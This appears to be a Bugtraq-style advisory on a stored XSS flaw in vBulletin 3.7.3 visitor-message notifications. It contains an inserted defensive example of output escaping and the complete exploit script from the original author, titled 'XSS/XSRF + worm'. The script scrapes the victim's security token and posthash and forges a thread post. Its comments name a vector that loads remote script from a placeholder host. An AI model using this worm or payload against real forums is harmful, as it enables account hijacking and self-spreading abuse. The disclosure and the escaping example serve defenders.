Written by Mx
Monday, 02 March 2009 22:41
vBulletin Visitor Messages Addon Comment Notification HTML Injection Vulnerability
Bugtraq ID: 32387
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Nov 20 2008 12:00AM
Updated: Mar 02 2009 06:27AM
Credit: Mx
Vulnerable: VBulletin VBulletin 3.7.3
Not Vulnerable: VBulletin VBulletin 3.7.4 PL1
Discussion

vBulletin is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
vBulletin 3.7.3 is vulnerable; other versions may also be affected.
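The bug class described above is a single stored value rendered through two output sinks, one that encodes it and one that does not. The following JavaScript is an added illustration, not part of this advisory and not vBulletin's own code: it models a visitor message rendered both on the profile wall and in the owner's notification list, shows the unencoded sink beside the corrected one, and includes a canary check that a maintainer can run against every render path. All function and field names are assumptions made for the example.

```javascript
'use strict';

// Encode the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Constructed sample of a visitor message as it might sit in the database.
// The body carries a harmless marker tag, not a working payload.
const storedMessage = {
  from: 'visitor',
  to: 'profileOwner',
  body: '<b onmouseover="x()">hi</b> <script>/* marker */</script>',
};

// Wall rendering (the path the advisory says is encoded): every field is
// escaped at output time, so markup in the body is shown as text.
function renderWall(msg) {
  return '<div class="vm"><span>' + escapeHtml(msg.from) + '</span>: ' +
    escapeHtml(msg.body) + '</div>';
}

// Notification rendering as the advisory describes it: the same stored body
// is interpolated into the page without encoding. This is the defect.
function renderNotificationVulnerable(msg) {
  return '<li>New message from ' + msg.from + ': ' + msg.body + '</li>';
}

// Corrected notification rendering: encode at this sink as well. Encoding
// belongs at every output point, not only at the first one that was noticed.
function renderNotificationFixed(msg) {
  return '<li>New message from ' + escapeHtml(msg.from) + ': ' +
    escapeHtml(msg.body) + '</li>';
}

// Canary check for a render function: feed it a body containing a tag that
// no template would emit on its own and confirm that the raw tag never
// reaches the output while its encoded form does.
function sinkEncodes(render) {
  const canary = { from: 'a', to: 'b', body: '<canary data-x="1">' };
  const out = render(canary);
  return !out.includes('<canary') && out.includes('&lt;canary');
}

// Audit every sink in one call; a false entry is a render path to fix.
function auditSinks() {
  return {
    wall: sinkEncodes(renderWall),
    notificationVulnerable: sinkEncodes(renderNotificationVulnerable),
    notificationFixed: sinkEncodes(renderNotificationFixed),
  };
}
```

Running auditSinks() reports the wall and the corrected notification as encoding and the original notification path as not; the same canary approach applies to any template engine where the set of render paths for one stored field is larger than the set of places where encoding was added.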
Exploit(s)/PoC(s)

Attackers can use a browser to exploit this issue.
The following example exploit is available:
===============================================================
32387.js
^^^^^^^^^

/* -----------------------------
 * Author = Mx
 * Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
 * Software = vBulletin
 * Addon = Visitor Messages
 * Version = 3.7.3
 * Attack = XSS/XSRF
 *
 * Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
 * with the visitor messages addon (a clone of a social network wall/comment area).
 * When posting XSS, the data is run through htmlentities(); before being displayed
 * to the general public/forum members. However, when posting a new message,
 * a new notification is sent to the commentee. The commenter posts an XSS vector such as
 * <script src="http://www.example2.com/nbd.js">, and when the commentee visits usercp.php
 * under the domain, they are hit with an unfiltered XSS attack. XSRF is also readily available
 * and I have included an example worm that makes the user post a new thread with your own
 * specified subject and message.
 *
 * Enjoy. Greets to Zain, Ytcracker, and http://www.example.com which was the first subject
 * of the attack method.
 * ----------------------------- */

function getNewHttpObject() {
    var objType = false;
    try {
        objType = new ActiveXObject('Msxml2.XMLHTTP');
    } catch(e) {
        try {
            objType = new ActiveXObject('Microsoft.XMLHTTP');
        } catch(e) {
            objType = new XMLHttpRequest();
        }
    }
    return objType;
}

function getAXAH(url) {
    var theHttpRequest = getNewHttpObject();
    theHttpRequest.onreadystatechange = function() { processAXAH(); };
    theHttpRequest.open("GET", url);
    theHttpRequest.send(false);

    function processAXAH() {
        if (theHttpRequest.readyState == 4) {
            if (theHttpRequest.status == 200) {
                var str = theHttpRequest.responseText;
                var secloc = str.indexOf('var SECURITYTOKEN = "');
                var sectok = str.substring(21+secloc, secloc+51+21);
                var posloc = str.indexOf('posthash" value="');
                var postok = str.substring(17+posloc, posloc+32+17);
                var subject = 'subject text';
                var message = 'message text';
                postAXAH('http://www.example.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');
            }
        }
    }
}

function postAXAH(url, params) {
    var theHttpRequest = getNewHttpObject();
    theHttpRequest.onreadystatechange = function() { processAXAHr(elementContainer); };
    theHttpRequest.open("POST", url);
    theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
    theHttpRequest.send(params);

    function processAXAHr(elementContainer) {
        if (theHttpRequest.readyState == 4) {
            if (theHttpRequest.status == 200) {
            }
        }
    }
}

getAXAH('http://www.example.com/4um/newthread.php?do=newthread&f=5');
document.write('<iframe src="http://www.example.com/4um/newthread.php?do=newthread&f=5">');
Solution

The vendor has released a patch to fix the issue. Please see the references for more information.
References

vBulletin 3.7.4 PL1 Released: http://www.vbulletin.com/forum/showthread.php?t=29166 (vBulletin)
vBulletin Homepage: http://www.vBulletin.co (vBulletin)